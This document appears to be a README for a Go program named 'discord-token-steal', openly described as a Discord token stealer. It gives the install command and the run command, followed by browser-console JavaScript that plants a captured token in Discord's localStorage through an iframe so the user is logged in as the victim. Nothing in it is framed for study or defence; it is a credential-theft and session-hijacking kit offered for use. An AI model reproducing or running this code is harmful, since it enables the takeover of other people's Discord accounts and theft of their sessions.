Discord Token Steal
A simple discord token stealer.
Get the Token
To get the token you must first install the program
go get gitea.s1.thoxy.xyz/thoxy/discord-token-steal
After to retrieve the token, all you need to do is call the program
discord-token-steal
Use the token
To use the token you just have to go to the Discord homepage, copy the code below in the web browser console (Dev-Tool)
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
After that you only have to modify the command below with the right token instead of $token$ and also enter it into the console.
login("$token$");